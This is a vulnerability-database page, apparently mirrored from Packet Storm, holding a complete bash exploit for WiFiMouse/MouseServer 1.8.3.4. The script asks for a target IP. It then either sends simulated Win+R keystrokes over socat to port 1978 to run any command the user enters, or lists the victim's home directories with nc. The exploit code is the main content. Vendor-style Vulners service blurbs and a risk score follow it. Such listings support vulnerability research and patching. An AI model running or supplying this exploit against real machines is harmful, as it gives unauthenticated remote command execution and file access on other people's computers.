Lucene search
K

WiFiMouse 1.8.3.4 Remote Code Execution

🗓️ 21 Sep 2022 00:00:00Reported by Febin Mon SajiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 318 Views

WiFiMouse 1.8.3.4 Remote Code Execution on Windows 1

Code
`# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)  
# Date: 15-08-2022  
# Author: Febin  
# Vendor Homepage: http://necta.us/  
# Software Link: http://wifimouse.necta.us/#download  
# Version: 1.8.3.4  
# Tested on: Windows 10  
  
#!/bin/bash  
printf "  
WiFiMouse / MouseServer 1.8.3.4 Exploit  
  
by FEBIN  
  
"  
  
printf "[*] Enter the Target IP Address: "  
read TARGET  
  
  
  
rce(){  
printf "[*] Enter the Command to execute on the Target: "  
read CMD  
  
sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978  
}  
  
dirlist(){  
  
echo "[*] User's Home Directory Contents:"  
  
echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-  
  
while $true  
do  
printf "\nList Directory:> "  
read DIR  
echo "[+] Contents of $DIR: "  
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-  
done  
  
  
}  
  
printf "  
[1] Remote Command Execution  
[2] Directory Listing  
  
"  
printf "Enter Your Choice (1 or 2) : "  
read CHOICE  
  
if [[ $CHOICE == "1" ]]  
then  
rce  
elif [[ $CHOICE == "2" ]]  
then  
dirlist  
  
else  
echo "[-] Invalid Choice!"  
fi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Sep 2022 00:00Current
7.4High risk
Vulners AI Score7.4
318